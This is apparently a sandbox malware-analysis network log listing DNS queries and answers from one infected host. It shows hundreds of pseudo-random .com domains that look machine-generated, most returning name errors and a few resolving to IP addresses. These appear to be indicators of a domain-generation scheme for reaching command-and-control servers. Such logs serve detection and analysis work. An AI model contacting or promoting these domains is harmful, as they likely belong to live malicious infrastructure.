Aug 23, 2024 18:43:34.308885098 CEST	192.168.2.5	1.1.1.1	0x2d7e	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308943987 CEST	192.168.2.5	1.1.1.1	0x36e5	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309101105 CEST	192.168.2.5	1.1.1.1	0x801d	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309259892 CEST	192.168.2.5	1.1.1.1	0x52d1	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309437037 CEST	192.168.2.5	1.1.1.1	0x8b52	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309478998 CEST	192.168.2.5	1.1.1.1	0x44e3	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309645891 CEST	192.168.2.5	1.1.1.1	0x1e87	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309712887 CEST	192.168.2.5	1.1.1.1	0xf499	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.309873104 CEST	192.168.2.5	1.1.1.1	0xfad7	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.310022116 CEST	192.168.2.5	1.1.1.1	0x8a28	Standard query (0)	qeqyqul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.299595118 CEST	192.168.2.5	1.1.1.1	0x529c	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:36.315187931 CEST	192.168.2.5	1.1.1.1	0x529c	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:36.338887930 CEST	192.168.2.5	1.1.1.1	0xb375	Standard query (0)	ww6.galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.957247972 CEST	192.168.2.5	1.1.1.1	0x5590	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.957822084 CEST	192.168.2.5	1.1.1.1	0xe6d1	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.958329916 CEST	192.168.2.5	1.1.1.1	0x304b	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.958859921 CEST	192.168.2.5	1.1.1.1	0xba40	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.959333897 CEST	192.168.2.5	1.1.1.1	0x4255	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.959811926 CEST	192.168.2.5	1.1.1.1	0xe38b	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.960279942 CEST	192.168.2.5	1.1.1.1	0x2d6a	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.960767984 CEST	192.168.2.5	1.1.1.1	0xc56	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.961214066 CEST	192.168.2.5	1.1.1.1	0xe8f3	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.961672068 CEST	192.168.2.5	1.1.1.1	0x7288	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.962142944 CEST	192.168.2.5	1.1.1.1	0x9b05	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.962599039 CEST	192.168.2.5	1.1.1.1	0x7811	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.963043928 CEST	192.168.2.5	1.1.1.1	0xfed8	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.963459969 CEST	192.168.2.5	1.1.1.1	0xd2b5	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.963906050 CEST	192.168.2.5	1.1.1.1	0x1cc3	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.964364052 CEST	192.168.2.5	1.1.1.1	0x3501	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.964867115 CEST	192.168.2.5	1.1.1.1	0x908c	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.965306997 CEST	192.168.2.5	1.1.1.1	0x1346	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.965749025 CEST	192.168.2.5	1.1.1.1	0xa965	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.966233969 CEST	192.168.2.5	1.1.1.1	0xf171	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.966723919 CEST	192.168.2.5	1.1.1.1	0x468d	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.967196941 CEST	192.168.2.5	1.1.1.1	0xf2de	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.967650890 CEST	192.168.2.5	1.1.1.1	0xfe39	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.968143940 CEST	192.168.2.5	1.1.1.1	0xbb36	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.968595982 CEST	192.168.2.5	1.1.1.1	0x1de3	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.969091892 CEST	192.168.2.5	1.1.1.1	0xc801	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.969568968 CEST	192.168.2.5	1.1.1.1	0x7e90	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.970072985 CEST	192.168.2.5	1.1.1.1	0x5771	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.971580029 CEST	192.168.2.5	1.1.1.1	0x55c	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.972117901 CEST	192.168.2.5	1.1.1.1	0x3086	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.996980906 CEST	192.168.2.5	1.1.1.1	0xd608	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.997076988 CEST	192.168.2.5	1.1.1.1	0xd65a	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.997188091 CEST	192.168.2.5	1.1.1.1	0x4c43	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.997735023 CEST	192.168.2.5	1.1.1.1	0xc690	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.998347044 CEST	192.168.2.5	1.1.1.1	0x71f5	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.998605967 CEST	192.168.2.5	1.1.1.1	0x78c7	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.998883963 CEST	192.168.2.5	1.1.1.1	0xcca8	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.999113083 CEST	192.168.2.5	1.1.1.1	0xdee6	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.999623060 CEST	192.168.2.5	1.1.1.1	0xa38e	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.999870062 CEST	192.168.2.5	1.1.1.1	0x734b	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.000083923 CEST	192.168.2.5	1.1.1.1	0x7635	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.000312090 CEST	192.168.2.5	1.1.1.1	0x5735	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.000524998 CEST	192.168.2.5	1.1.1.1	0x3607	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.000708103 CEST	192.168.2.5	1.1.1.1	0xfbee	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.000935078 CEST	192.168.2.5	1.1.1.1	0xadf3	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.001152992 CEST	192.168.2.5	1.1.1.1	0x725c	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.003582001 CEST	192.168.2.5	1.1.1.1	0xb926	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.003824949 CEST	192.168.2.5	1.1.1.1	0x1ace	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.003971100 CEST	192.168.2.5	1.1.1.1	0x8c9a	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004018068 CEST	192.168.2.5	1.1.1.1	0xe9a9	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004309893 CEST	192.168.2.5	1.1.1.1	0x8705	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004508972 CEST	192.168.2.5	1.1.1.1	0x3273	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004508972 CEST	192.168.2.5	1.1.1.1	0xf8f	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004739046 CEST	192.168.2.5	1.1.1.1	0x246a	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004848957 CEST	192.168.2.5	1.1.1.1	0xe3a5	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.004944086 CEST	192.168.2.5	1.1.1.1	0xc4cc	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005131006 CEST	192.168.2.5	1.1.1.1	0xaa79	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005158901 CEST	192.168.2.5	1.1.1.1	0x8f0b	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005326986 CEST	192.168.2.5	1.1.1.1	0xe180	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005481005 CEST	192.168.2.5	1.1.1.1	0x9c7d	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005649090 CEST	192.168.2.5	1.1.1.1	0xe837	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005784035 CEST	192.168.2.5	1.1.1.1	0xf0c8	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005920887 CEST	192.168.2.5	1.1.1.1	0x7fcf	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.006504059 CEST	192.168.2.5	1.1.1.1	0x6098	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.556627989 CEST	192.168.2.5	1.1.1.1	0xe935	Standard query (0)	qedysov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.557362080 CEST	192.168.2.5	1.1.1.1	0x58c8	Standard query (0)	pumylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.557780981 CEST	192.168.2.5	1.1.1.1	0x2024	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.567301989 CEST	192.168.2.5	1.1.1.1	0x344e	Standard query (0)	lysysod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.567852974 CEST	192.168.2.5	1.1.1.1	0x90c6	Standard query (0)	vonyket.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.568396091 CEST	192.168.2.5	1.1.1.1	0x8842	Standard query (0)	qekynuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.568907976 CEST	192.168.2.5	1.1.1.1	0x1955	Standard query (0)	pupypiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.569403887 CEST	192.168.2.5	1.1.1.1	0xde69	Standard query (0)	ganykaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.570231915 CEST	192.168.2.5	1.1.1.1	0xbd4b	Standard query (0)	lykynyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.570774078 CEST	192.168.2.5	1.1.1.1	0xfdc0	Standard query (0)	vopypif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.571310997 CEST	192.168.2.5	1.1.1.1	0x7e89	Standard query (0)	qebykap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.571787119 CEST	192.168.2.5	1.1.1.1	0x2d57	Standard query (0)	pujybyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.572264910 CEST	192.168.2.5	1.1.1.1	0x3d49	Standard query (0)	gatypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.572792053 CEST	192.168.2.5	1.1.1.1	0x696a	Standard query (0)	lyvyjox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.573319912 CEST	192.168.2.5	1.1.1.1	0x940b	Standard query (0)	vojybek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.573824883 CEST	192.168.2.5	1.1.1.1	0x3d18	Standard query (0)	qetytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.574311972 CEST	192.168.2.5	1.1.1.1	0x52e2	Standard query (0)	puvyjop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.574806929 CEST	192.168.2.5	1.1.1.1	0x7805	Standard query (0)	gahyvew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.575330019 CEST	192.168.2.5	1.1.1.1	0x493	Standard query (0)	lyrytun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.575819969 CEST	192.168.2.5	1.1.1.1	0xfee3	Standard query (0)	vocyjic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.576363087 CEST	192.168.2.5	1.1.1.1	0x473f	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.576833963 CEST	192.168.2.5	1.1.1.1	0x1398	Standard query (0)	purytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.577337027 CEST	192.168.2.5	1.1.1.1	0xeb85	Standard query (0)	gacyhis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.577827930 CEST	192.168.2.5	1.1.1.1	0x3024	Standard query (0)	lygyvar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.578332901 CEST	192.168.2.5	1.1.1.1	0x67f8	Standard query (0)	vowyrym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.578830957 CEST	192.168.2.5	1.1.1.1	0x3039	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.579323053 CEST	192.168.2.5	1.1.1.1	0x48d4	Standard query (0)	pufycol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.590270042 CEST	192.168.2.5	1.1.1.1	0xdd3f	Standard query (0)	gaqyreh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.590457916 CEST	192.168.2.5	1.1.1.1	0x534a	Standard query (0)	lyxygud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.590600967 CEST	192.168.2.5	1.1.1.1	0xb10f	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.590747118 CEST	192.168.2.5	1.1.1.1	0xd3a5	Standard query (0)	qeqyreq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.590882063 CEST	192.168.2.5	1.1.1.1	0xdf2f	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591017008 CEST	192.168.2.5	1.1.1.1	0x8307	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591141939 CEST	192.168.2.5	1.1.1.1	0xef1f	Standard query (0)	lymywaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591274977 CEST	192.168.2.5	1.1.1.1	0x91ff	Standard query (0)	volygyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591715097 CEST	192.168.2.5	1.1.1.1	0x86e6	Standard query (0)	qedyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591865063 CEST	192.168.2.5	1.1.1.1	0xf1be	Standard query (0)	pumywaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.592010975 CEST	192.168.2.5	1.1.1.1	0xef16	Standard query (0)	galyfyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.592499018 CEST	192.168.2.5	1.1.1.1	0x7e78	Standard query (0)	lysyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.592647076 CEST	192.168.2.5	1.1.1.1	0x6653	Standard query (0)	vonyqok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593146086 CEST	192.168.2.5	1.1.1.1	0x21	Standard query (0)	qekyfeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593287945 CEST	192.168.2.5	1.1.1.1	0x4e8	Standard query (0)	pupyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593419075 CEST	192.168.2.5	1.1.1.1	0x6700	Standard query (0)	ganyqow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593550920 CEST	192.168.2.5	1.1.1.1	0xeb7	Standard query (0)	lykyfen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593687057 CEST	192.168.2.5	1.1.1.1	0xc5c1	Standard query (0)	vopyzuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593816996 CEST	192.168.2.5	1.1.1.1	0x1adc	Standard query (0)	qebyqil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.593955994 CEST	192.168.2.5	1.1.1.1	0xe523	Standard query (0)	pujydag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594089985 CEST	192.168.2.5	1.1.1.1	0x558a	Standard query (0)	gatyzys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594224930 CEST	192.168.2.5	1.1.1.1	0x7f7b	Standard query (0)	lyvymir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594362020 CEST	192.168.2.5	1.1.1.1	0x9ce0	Standard query (0)	vojydam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594496965 CEST	192.168.2.5	1.1.1.1	0x5c53	Standard query (0)	qetylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594630003 CEST	192.168.2.5	1.1.1.1	0xf90f	Standard query (0)	puvymul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594758987 CEST	192.168.2.5	1.1.1.1	0xfab	Standard query (0)	gahydoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.594883919 CEST	192.168.2.5	1.1.1.1	0x774e	Standard query (0)	lyryled.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.604579926 CEST	192.168.2.5	1.1.1.1	0x36e2	Standard query (0)	vocymut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.609097004 CEST	192.168.2.5	1.1.1.1	0xbc0a	Standard query (0)	qegysoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.614398956 CEST	192.168.2.5	1.1.1.1	0xd82e	Standard query (0)	purylev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.622442961 CEST	192.168.2.5	1.1.1.1	0x868c	Standard query (0)	gacynuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.622620106 CEST	192.168.2.5	1.1.1.1	0x7f91	Standard query (0)	lygysij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.626184940 CEST	192.168.2.5	1.1.1.1	0x7ebb	Standard query (0)	vowykaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.634584904 CEST	192.168.2.5	1.1.1.1	0x8861	Standard query (0)	qexynyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.634757996 CEST	192.168.2.5	1.1.1.1	0x600d	Standard query (0)	pufypiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.759641886 CEST	192.168.2.5	1.1.1.1	0x6752	Standard query (0)	gaqykab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.766499996 CEST	192.168.2.5	1.1.1.1	0xc845	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.866782904 CEST	192.168.2.5	1.1.1.1	0xd44	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.965892076 CEST	192.168.2.5	1.1.1.1	0x94ba	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.050657034 CEST	192.168.2.5	1.1.1.1	0x6e10	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.073441029 CEST	192.168.2.5	1.1.1.1	0x5c47	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.164768934 CEST	192.168.2.5	1.1.1.1	0x939b	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.168492079 CEST	192.168.2.5	1.1.1.1	0x1c15	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.376519918 CEST	192.168.2.5	1.1.1.1	0x1c15	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.376553059 CEST	192.168.2.5	1.1.1.1	0x939b	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.017254114 CEST	192.168.2.5	1.1.1.1	0x9b4d	Standard query (0)	ww16.vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.123022079 CEST	192.168.2.5	1.1.1.1	0xb024	Standard query (0)	ww25.lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.235950947 CEST	192.168.2.5	1.1.1.1	0x9b4d	Standard query (0)	ww16.vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.329720974 CEST	192.168.2.5	1.1.1.1	0xb024	Standard query (0)	ww25.lyxynyx.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 23, 2024 18:42:11.839196920 CEST	1.1.1.1	192.168.2.5	0xd200	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.847367048 CEST	1.1.1.1	192.168.2.5	0xaeb1	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.847367048 CEST	1.1.1.1	192.168.2.5	0xaeb1	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.848711014 CEST	1.1.1.1	192.168.2.5	0xf0a2	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.849841118 CEST	1.1.1.1	192.168.2.5	0xcbd9	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.850884914 CEST	1.1.1.1	192.168.2.5	0x843e	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.860313892 CEST	1.1.1.1	192.168.2.5	0x9de5	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.862687111 CEST	1.1.1.1	192.168.2.5	0x12c0	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.864342928 CEST	1.1.1.1	192.168.2.5	0x3472	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.869971991 CEST	1.1.1.1	192.168.2.5	0x8300	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.873773098 CEST	1.1.1.1	192.168.2.5	0xf955	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.876755953 CEST	1.1.1.1	192.168.2.5	0x5123	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.878567934 CEST	1.1.1.1	192.168.2.5	0xaee7	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.878968954 CEST	1.1.1.1	192.168.2.5	0x9755	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.880732059 CEST	1.1.1.1	192.168.2.5	0x58a1	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.887810946 CEST	1.1.1.1	192.168.2.5	0x1ad3	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.893137932 CEST	1.1.1.1	192.168.2.5	0xedc6	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.894608974 CEST	1.1.1.1	192.168.2.5	0x97fb	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.895600080 CEST	1.1.1.1	192.168.2.5	0xcf90	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.897391081 CEST	1.1.1.1	192.168.2.5	0xb306	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.899945974 CEST	1.1.1.1	192.168.2.5	0x5ed	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.900836945 CEST	1.1.1.1	192.168.2.5	0x63cd	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.900922060 CEST	1.1.1.1	192.168.2.5	0xf5bf	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.901839972 CEST	1.1.1.1	192.168.2.5	0xe90b	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.906212091 CEST	1.1.1.1	192.168.2.5	0x7e71	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.907279968 CEST	1.1.1.1	192.168.2.5	0xa271	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.910033941 CEST	1.1.1.1	192.168.2.5	0xe859	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.914495945 CEST	1.1.1.1	192.168.2.5	0x6eb2	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.914613008 CEST	1.1.1.1	192.168.2.5	0xa7fa	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.914613008 CEST	1.1.1.1	192.168.2.5	0xa7fa	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.915180922 CEST	1.1.1.1	192.168.2.5	0xe53d	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.915668964 CEST	1.1.1.1	192.168.2.5	0xdc51	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.915915012 CEST	1.1.1.1	192.168.2.5	0x6069	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
